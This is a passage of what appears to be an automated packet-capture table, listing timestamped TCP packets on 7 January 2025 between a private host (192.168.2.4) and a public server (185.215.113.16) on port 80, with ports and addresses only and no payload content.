Jan 7, 2025 10:08:20.268871069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268878937 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268913031 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269021034 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269196987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269265890 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269376040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269388914 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269399881 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269417048 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269424915 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269454956 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269536018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269548893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269560099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269572020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269582033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269582987 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269593000 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269607067 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269637108 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269725084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269736052 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269746065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269757032 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269769907 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269794941 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269906998 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269917965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269949913 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.269949913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269963026 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269973040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.269999027 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270144939 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270159960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270172119 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270181894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270191908 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270193100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270205021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270220995 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270221949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270227909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270235062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270241022 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270246029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270262003 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270262003 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270263910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270277977 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270286083 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270447016 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270462036 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270478964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270488977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270493984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270498991 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270559072 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270587921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270601034 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270615101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270625114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270637989 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270663977 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270761013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270772934 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270783901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270796061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270806074 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270827055 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.270946026 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270956993 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270967960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270978928 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.270989895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271008015 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.271085978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271096945 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271107912 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271117926 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271147966 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.271250963 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271261930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271272898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271282911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.271292925 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.271323919 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391390085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391406059 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391419888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391485929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391499043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391531944 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391527891 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391587973 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391591072 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391634941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391654015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391668081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391680002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391693115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391695023 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391702890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391738892 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391738892 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391782999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391794920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391805887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391828060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391844034 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391874075 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391885042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391897917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391910076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.391951084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.391961098 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392013073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392023087 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392054081 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392069101 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392085075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392100096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392110109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392122984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392132998 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392142057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392154932 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392155886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392168999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392187119 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392205000 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392251968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392263889 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392292023 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392311096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392314911 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392326117 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392513037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392524004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392535925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392546892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392558098 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392571926 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392602921 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392607927 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392628908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392642021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392652988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392663956 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392679930 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392697096 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392858028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392869949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392880917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392920017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.392945051 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.392966032 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.393394947 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393446922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393459082 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393506050 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.393589973 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393603086 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393615007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393630981 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393642902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393644094 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.393660069 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.393688917 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.393728971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393740892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393752098 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393764019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393776894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393780947 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.393790007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393824100 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.393847942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.393870115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393882036 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393956900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393968105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393980980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.393992901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394007921 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.394028902 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.394109964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394121885 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394141912 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394153118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394165039 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.394165993 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394184113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394207001 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.394233942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.394300938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394313097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394325972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394337893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394349098 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394356012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.394386053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.394402027 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394414902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394427061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394437075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.394469023 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.399192095 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.516587019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516613960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516630888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516643047 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516653061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516664982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516681910 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.516681910 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.516741037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516743898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.516752958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516762972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516772985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516788006 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516798973 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.516819000 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.516834974 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516845942 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.516871929 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.516997099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517007113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517020941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517030954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517035007 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517049074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517055035 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517059088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517071009 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517082930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517093897 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517096996 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517102957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517115116 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517116070 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517127037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517136097 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517141104 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517172098 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517189980 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517215967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517225981 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517240047 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517258883 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517374992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517386913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517395973 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517405033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517421007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517424107 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517431974 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517442942 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517446041 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517455101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517477036 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517497063 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517507076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517517090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517537117 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517565012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517575026 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517585039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517618895 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517654896 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517666101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517674923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517716885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517741919 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517751932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517761946 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.517786026 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.517821074 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518074989 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518086910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518098116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518106937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518129110 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518157959 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518223047 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518232107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518237114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518273115 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518277884 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518289089 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518313885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518402100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518416882 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518429995 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518438101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518454075 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518472910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518476009 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518481970 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518493891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518503904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518526077 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518562078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518572092 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518583059 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518609047 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518636942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518642902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518656015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518681049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518724918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518735886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518745899 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518755913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518776894 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518805027 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518841028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518851042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518860102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518873930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518882990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.518894911 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.518912077 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.519001007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519011021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519023895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519033909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519045115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519049883 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.519068956 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.519087076 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.519099951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519110918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519123077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519145966 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.519202948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519215107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.519224882 CET	80	49884	185.215.113.16	192.168.2.4
